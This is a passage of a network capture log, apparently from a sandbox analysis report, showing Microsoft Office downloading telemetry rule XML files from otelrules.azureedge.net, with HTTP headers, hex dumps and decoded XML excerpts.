                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:55 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                                                                                        x-ms-request-id: c1df62f0-301e-0099-5a1b-3d6683000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041155Z-178bfbc474bv7whqhC1NYC1fg400000005gg000000003kfg
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:56 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        82192.168.2.74979013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:55 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:55 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                        x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041155Z-174c587ffdfp4vpjhC1TEBybqw00000003u000000000p08p
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:56 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        83192.168.2.74979413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:55 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:55 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                                                                                        x-ms-request-id: 00c17fdd-701e-000d-2f70-3c6de3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041155Z-174c587ffdf7t49mhC1TEB4qbg00000003u000000000d15r
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        84192.168.2.74979613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:55 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:55 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                        x-ms-request-id: 14aff01d-f01e-005d-5831-3d13ba000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041155Z-174c587ffdfn4nhwhC1TEB2nbc000000040000000000a0r0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:56 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        85192.168.2.74980513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:57 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 3342
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                                                                                        x-ms-request-id: dc5ae1d1-201e-0096-3d45-3dace6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041158Z-178bfbc474bv7whqhC1NYC1fg400000005f0000000006nuy
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:58 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        86192.168.2.74980113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:57 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1952
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                        x-ms-request-id: 6b04d5e8-e01e-000c-65ad-3b8e36000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041158Z-174c587ffdfx984chC1TEB676g000000040g0000000011a0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:58 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        87192.168.2.74980413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:57 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 2592
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                        x-ms-request-id: bc0c8c97-701e-0053-1e45-3c3a0a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041158Z-178bfbc474bpnd5vhC1NYC4vr400000005h0000000001mdt
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:58 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        88192.168.2.74980313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:57 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                        x-ms-request-id: 2c6bdbd8-801e-0035-0204-3e752a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041158Z-178bfbc474bvjk8shC1NYC83ns0000000590000000009n9z
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:58 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        89192.168.2.74980213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:57 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 958
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                        x-ms-request-id: 4857c71c-401e-0067-7e3a-3c09c2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041158Z-15b8b599d889gj5whC1TEBfyk000000003u0000000003rxr
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:58 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        90192.168.2.74981113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:00 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:00 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:00 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                        x-ms-request-id: 0cd55988-601e-003e-4d0c-3d3248000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041200Z-178bfbc474bv587zhC1NYCny5w000000057g00000000f0uc
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:00 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        91192.168.2.74981213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:00 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
